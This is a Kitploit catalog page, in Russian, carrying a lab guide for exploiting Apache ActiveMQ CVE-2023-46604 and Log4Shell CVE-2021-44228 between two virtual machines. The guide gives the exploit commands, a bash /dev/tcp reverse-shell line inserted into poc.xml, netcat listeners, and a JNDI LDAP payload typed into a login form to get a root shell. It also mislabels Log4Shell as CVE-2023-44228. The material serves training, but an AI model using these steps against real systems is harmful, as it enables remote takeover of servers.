Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-Lab — Инструкции по эксплуатации уязвимостей CVE-2021-44228 и CVE-2023-46604 | Kitploit
Инструменты/GitHubGitHub/dcm2406/cve-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubdcm2406/cve-lab

CVE-Lab

Инструкции по эксплуатации уязвимостей CVE-2021-44228 и CVE-2023-46604

Репозиторий
2102 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Лаборатория CVE-2023-46604

Это лабораторная работа, посвященная эксплуатации уязвимости CVE-2023-46604.

Благодарности

  • Apache ActiveMQ
  • CVE-2023-46604

Среда

Для этой лабораторной работы требуется установка двух виртуальных машин. Одна машина Kali Linux версии 2023.4 и одна машина Ubuntu версии 22.04.3 LTS. Вы можете скачать их здесь:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 для windows
  • VMware-workstation-17.5.0 для linux

Модель и системные требования

На машине Kali Linux:

Установка git

$sudo apt install git

Установка gedit

$sudo apt install gedit

На машине Ubuntu:

Установка git

$sudo apt install git

Установка openjdk 18

$sudo apt install openjdk-18-jdk

Установка пакета ActiveMQ 5.18.2

$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

Сборка сервера (запуск службы activemq)

На машине Ubuntu Откройте окно терминала и выполните команду, как указано ниже:

$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

Проверьте статус службы:

$./activemq status

Если служба запускается успешно, на экране терминала отобразится «ActiveMQ Broker is running».

Вы также можете перейти по адресу http://127.0.0.1:8161, чтобы открыть диспетчер брокера ActiveMQ. Он содержит имя хоста, версию, идентификатор, время работы и другую информацию.

Эксплуатация

На машине Kali Linux

Загрузка ресурсов для процесса эксплуатации:

$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

Как вы видите, у нас есть два файла: exploit.py и poc.xml:

  • Файл poc.xml содержит фрагмент вредоносного кода, который использует уязвимость в протоколе OpenWire.
  • Файл exploit.py отвечает за HTTP-шифрование и отправку файла poc.xml брокеру на целевой машине. Откройте веб-сервер по пути к ресурсам:
$cd CVE-2023-46604
$python3 -m http.server

Откройте новое окно терминала, чтобы отправить файл poc.xml на сервер цели с помощью файла exploit.py:

$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

После выполнения команды на целевой машине запускается приложение «Калькулятор». Это доказывает, что уязвимость была успешно использована. Продолжим создание обратной оболочки для управления целевой машиной.

Откройте новое окно терминала для прослушивания входящих соединений обратной оболочки:

$sudo su
$nc -nlvp 4444

Вернитесь в предыдущий терминал и отредактируйте файл poc.xml:

$gedit poc.xml

Замените значение gnome-calculator на bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 и сохраните файл.

Снова отправьте вредоносный код:

$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Результат выполнения этой команды — получение рутовой оболочки на целевой машине. РУТ ПОЛУЧЕН!!!

Лаборатория CVE-2021-44228

Благодарности

  • Apache log4j
  • CVE-2023-44228 - log4shell

Среда

Для этой лабораторной работы требуется установка двух виртуальных машин. Kali Linux версии 2023.4 и Ubuntu версии 22.04.3 LTS. Вы можете скачать их здесь:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 для windows
  • VMware-workstation-17.5.0 для linux

Модель и системные требования

На машине Kali Linux:

Установка git

$sudo apt install git

Установка gedit

$sudo apt install gedit

На машине Ubuntu:

Установка git

$sudo apt install git

Установка docker

$sudo apt install docker.io 

Сборка веб-сервера

На машине Ubuntu

Шаг 1: Загрузка openjdk

$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

Шаг 2: Загрузка и сборка docker-файла

$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
$docker build -t cve44228
$docker run --network host cve44228

После выполнения приведенных выше команд у нас есть веб-сайт. Для просмотра веб-сайта вы можете использовать URL: http://<ubuntu_ip>:8080. В этом руководстве адрес будет выглядеть так: http://192.168.132.135:8080

Эксплуатация

На машине Kali Linux загрузите необходимые ресурсы для эксплуатации уязвимости

Загрузка poc

$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

Загрузка openjdk

$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//переместите файл openjdk в каталог, содержащий файл poc
$mv jdk-8u20-linux-x64.tar.gz <путь к каталогу, содержащему файл poc>

$tar -xf jdk-8u20-linux-x64.tar.gz   //распакуйте файл

Откройте новый терминал для прослушивания входящих соединений обратной оболочки:

$sudo su
$nc -nlvp 9001

Запустите LDAP и HTTP службы с файлом poc

$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

Команда вернет результат, похожий на следующий

[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

Здесь нас интересует только сгенерированное значение jndi. Откройте веб-браузер и введите адрес созданного ранее веб-сайта. Выполните вход, используя значение jndi. В этот момент терминал netcat получает соединение. РУТ ПОЛУЧЕН!!!

Документация

CVE Research Report

Поддержка

По вопросам поддержки пишите на адрес [email protected]

Авторы

  • @dcm2406
  • @tCu0n9
Скачать инструмент